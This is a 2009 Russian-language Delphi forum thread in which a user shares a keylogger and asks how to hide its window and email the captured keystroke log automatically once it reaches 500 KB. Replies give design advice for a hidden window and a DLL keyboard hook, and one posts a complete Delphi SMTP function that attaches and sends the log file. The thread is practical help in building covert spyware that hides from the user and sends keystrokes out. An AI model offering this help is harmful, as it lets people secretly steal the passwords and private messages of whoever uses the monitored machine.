Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Общие вопросы Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 03.01.2009, 15:15   #1
doniyor
Форумчанин
 
Аватар для doniyor
 
Регистрация: 22.04.2008
Сообщений: 143
Радость :::Keylogger:::

Знаю, эта тема не раз обсуждалась, но всё же...
Друзья! Предлагаю вашему вниманию код кейлоггера и надеюсь на Ваш опыт!!!
Весь этот код Delphi7 компилирует без ошибок см. эттэчмент.


А вот проблемма в следущем.

1) Нужно чтобы в определённое время (когда файл достигнет 500 КБ) вся инфа (т.е. log-файл) в качестве вложения отправлялся на мыло. У меня есть масса способов как это сделать, но все они предпологают наличие формы. Помогите как сделать это программно.

2) Как сделать эту "форму" невидимой. В режиме программирования нет формы, так и я не могу выполнить никаких действий.
Вложения
Тип файла: rar MyKeylogger.rar (178.1 Кб, 315 просмотров)
Мой сайт - www.fortis-soft.narod.ru

Последний раз редактировалось doniyor; 03.01.2009 в 15:21.
doniyor вне форума Ответить с цитированием
Старый 03.01.2009, 15:28   #2
Роман Радер
Форумчанин
 
Аватар для Роман Радер
 
Регистрация: 16.12.2006
Сообщений: 859
По умолчанию

забудь про форму, создавай нужные компоненты динамически. Например,компонент indy idHttp
Код:
var ih:idHTTP;
begin
  ih:=TIdHTTP.Create(nil);
  lalala
  ih.free;
end;
ps: аналогично и с idsmtp и др. и вообще со всеми компонентами.
pps: не забудь в uses добавить модуль. чтоб узнать какой - наведи на компонени на палитре и в скобках написано.
Роман Радер вне форума Ответить с цитированием
Старый 03.01.2009, 15:46   #3
doniyor
Форумчанин
 
Аватар для doniyor
 
Регистрация: 22.04.2008
Сообщений: 143
По умолчанию Thanks!!!

Спасибо! Щас попробую! А... как сделать так чтобы формы не было видно
Цитата:
ДИНАМИЧЕСКИ
?
Мой сайт - www.fortis-soft.narod.ru
doniyor вне форума Ответить с цитированием
Старый 03.01.2009, 16:14   #4
ViktorXP
Форумчанин
 
Аватар для ViktorXP
 
Регистрация: 24.11.2006
Сообщений: 108
По умолчанию

Цитата:
Сообщение от doniyor Посмотреть сообщение
А... как сделать так чтобы формы не было видно ?
А зачем? она тебе вабще не нужна. ноесли сильно хочется то у формы есть свойство Visible или метод Hide как и увсех остальных визуальных компонентов
ViktorXP вне форума Ответить с цитированием
Старый 03.01.2009, 16:24   #5
Altera
Старожил
 
Аватар для Altera
 
Регистрация: 29.01.2008
Сообщений: 2,406
По умолчанию

программа зависает при нажатии клавиш
Altera вне форума Ответить с цитированием
Старый 03.01.2009, 16:50   #6
ViktorXP
Форумчанин
 
Аватар для ViktorXP
 
Регистрация: 24.11.2006
Сообщений: 108
По умолчанию

только что скачал архив. и понял что создания окна ты тупо скопировал откудато. так как ты спрашиваеш как спрятать окно при этом его же при создании и заставляеш показатся параметром WS_VISIBLE (кроме этого я не пойму зачем ему системное меню)
потом тыже его снова показываеш с помощю
ShowWindow(Handle, SW_ShoW);
а помтом ставиш еще одну ловушку.
если чесно то вабще ловушки как по мне ставиш не правильно. да и данныэ тоже. я бы в дллке иницыализировал какуюто глобальную переменную (тудабы положил хендл окна, и хранил бы там принятые данные)
писалбы по байтно в этот масив и когда он наполнился то передалбы сообщение ексехе которая забрет данные и запишет в файл/отправит по почте.
и подключи модуль Classes там есть удобная вещь как AllocateHWnd. создаст не визуальное окно с методом. просто тебе по любому прийдется юзать инди компоненты а они уже юзают этот модуль. Хотя можно на сокетах навпрямую общатся с pop3 сервером. можеш на вики почитать про pop3 протокол. посути тебе того хватит чтобы написать свою работу на сокетах (если ты канешно работал с сокетами)
ViktorXP вне форума Ответить с цитированием
Старый 04.01.2009, 07:54   #7
doniyor
Форумчанин
 
Аватар для doniyor
 
Регистрация: 22.04.2008
Сообщений: 143
По умолчанию Спасибо!

Действительно не обратил внимания на то что писал. В любом случае форма моего кейлоггера не видна. Теперь буду пытаться создавать indy-компоненты динамически и отправлять почту (с сокетами работать мало опыта). К стати у меня есть код -
var
Msg: TIdMessage;
begin
Msg.Subject:='тема сообщения'; //текст темы сообщения
Msg.Recipients.EMailAddresses:='bog danwe@mail.ru';
//указываем адрес получателя
Msg.From.Adress:='delphi@mail.ru'; //указываем автора письма
Msg.Body.Text:='текст сообщения'; //размещаем текст сообщения
Msg.Date:=StrToDate('01.12.2004');//дата отправки письма может быть любой
end;
полный вариант отправки - http://delphi-ex.narod.ru/how_to_send_mail.htm
Его можно использовать для отправки эттечмента моего кейлоггера?
Мой сайт - www.fortis-soft.narod.ru

Последний раз редактировалось doniyor; 04.01.2009 в 07:56.
doniyor вне форума Ответить с цитированием
Старый 04.01.2009, 10:46   #8
UnD)eaD)Snake
Форумчанин Подтвердите свой е-майл
 
Аватар для UnD)eaD)Snake
 
Регистрация: 07.07.2007
Сообщений: 241
По умолчанию

отправка файлов:

Код:
function SendMail(FilePath,Email:string):string;
var M:TIdMessage; SMTP:TIdSMTP; A:TIdAntiFreeze;
begin
if FileExists(FilePath) then begin
Result:='Файл отправлен!';
M:=TIdMessage.Create(nil);
SMTP:=TIdSMTP.Create(nil);
A:=TIdAntiFreeze.Create(nil);
A.Active:=true;
A.IdleTimeOut:=250;
M.Subject:='Тема сообщения';
M.Recipients.EMailAddresses:=Email; // куда отправляем
M.From.Address:='vasya@mail.ru'; // через этот ящик логинимся
TIdAttachment.Create(M.MessageParts,FilePath);
SMTP.AuthenticationType:=atLogin;
SMTP.Host:='smtp.mail.ru';
SMTP.Username:='vasya';  // названия ящика, без "@mail.ru"
SMTP.Password:='123456'; // пароль от ящика vasya@mail.ru
SMTP.Connect();
if SMTP.Connected then
   begin
   try SMTP.Send(M);
   except Result:='Ошибка отправления!';
   end;
   end else Result:='Ошибка отправления!';
SMTP.Disconnect;
M.Free;
SMTP.Free;
A.Free;
end else Result:='Файл не найден!';
end;
UnD)eaD)Snake вне форума Ответить с цитированием
Старый 04.01.2009, 18:57   #9
doniyor
Форумчанин
 
Аватар для doniyor
 
Регистрация: 22.04.2008
Сообщений: 143
По умолчанию Огромное спасибо!

Щас попробую. Вообще у меня не было проблем с отправкой писем на мыло если дело касалось отдельного приложения. Но тут (как я понял) дело обстоит иначе... Ещё раз thanks за содействие!
Мой сайт - www.fortis-soft.narod.ru
doniyor вне форума Ответить с цитированием
Старый 05.01.2009, 07:56   #10
[koyot]
Пользователь
 
Аватар для [koyot]
 
Регистрация: 17.12.2008
Сообщений: 17
По умолчанию

про формы всякие их видимость невидимость особенно основной формы неплохо описано в книге "Delphi глазами хакера" кстати если главной форме просто дать visible:=false она остается видимой
ICQ 897-45-46
[koyot] вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
keylogger DeDoK Общие вопросы Delphi 15 06.06.2010 00:15
Как правильно удалить с компа Keylogger? Кира Помощь студентам 4 17.12.2007 16:51